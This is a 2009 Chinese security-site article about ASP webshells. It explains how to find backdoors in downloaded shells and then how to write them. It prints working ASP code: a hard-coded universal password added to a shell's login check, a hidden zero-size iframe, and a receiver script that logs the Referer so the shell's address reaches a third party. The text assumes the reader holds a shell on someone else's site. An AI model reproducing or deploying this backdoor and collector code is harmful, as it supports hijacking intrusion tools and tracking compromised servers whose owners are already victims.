官方首页
 计算机科学与技术
 湖畔文学
 星之传说
 蓝色湖畔桃园
 湖畔艺术
 湖畔科技
 本站留言
热门关键字:    dreamlandcn.com    蓝色湖畔
 >>相关文章
·“网银窃贼”已能突破银行U盾入
·基于Cache的隐藏文件(和注
·找asp木马后门,写asp木马
·清华集采办公软件增加国产永中O
·苹果App Store退款规定
·全球10大黑客攻击源:美国居首
·消息称淘宝前总裁孙彤宇将在杭州
·Sun本周将裁员1500人
·Conflicker蠕虫 愚人
·MySpace宣布支持Wind
 >>点击排行TOP10
·多种排序算法,多种语言讲解(前言)
·多种排序算法,多种语言讲解(简单选
·【其它欣赏】少儿不宜的设计
·QQ空间代码 最新代码 9月最新可
·c#网络应用编程基础 第5章 Wi
·多种排序算法,多种语言讲解(冒泡排
·c#网络应用编程基础 第5章 Wi
·多种排序算法,多种语言讲解(堆排序
·多种排序算法,多种语言讲解(快速排
·多种排序算法,多种语言讲解(树形选
·QQ空间免费代码 小窝模式免费导航
·VC中使用GetModuleFil
·多种排序算法,多种语言讲解(希尔排
·多种排序算法,多种语言讲解(交换排
·如何使用EasyRecovery找
 
 当前位置:网站首页 > 计算机科学与技术 > 网页技术 > 网络安全 > 浏览正文
找asp木马后门,写asp木马后门
作者:佚名    来源:本站原创    点击数:   更新时间:2009年03月31 【字体:
我等小菜自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了

难免有些居心不良的人会在里面加后门。

好不容易拿到个shell又被别人偷走了怎么甘心啊!

所以在下完asp木马后要先检查有没后门,

通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具

解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录

正常的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

加有万能密码的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>

找到后删了,到此asp后门就算剔除了!


下面教大家后门的原理:

这是一段收信的asp代码将其保存为1.asp

<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>

代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

然后里用

<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>

插到asp木马中

那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

我们学习他是为了更好的理解,大家千万别用来整菜鸟!
Tags:dreamlandcn.com
Google
关于我们 | 服务指南 | 著作权与商标声明 | 法律声明 | 服务条款 | 隐私声明 | 诚征英才  | 友情链接
Powered by ACTCMS 2.0
Copyrights©2008-2009 蓝色湖畔 www.dreamlandcn.comAll Rights Reserved. 滇ICP备05000680号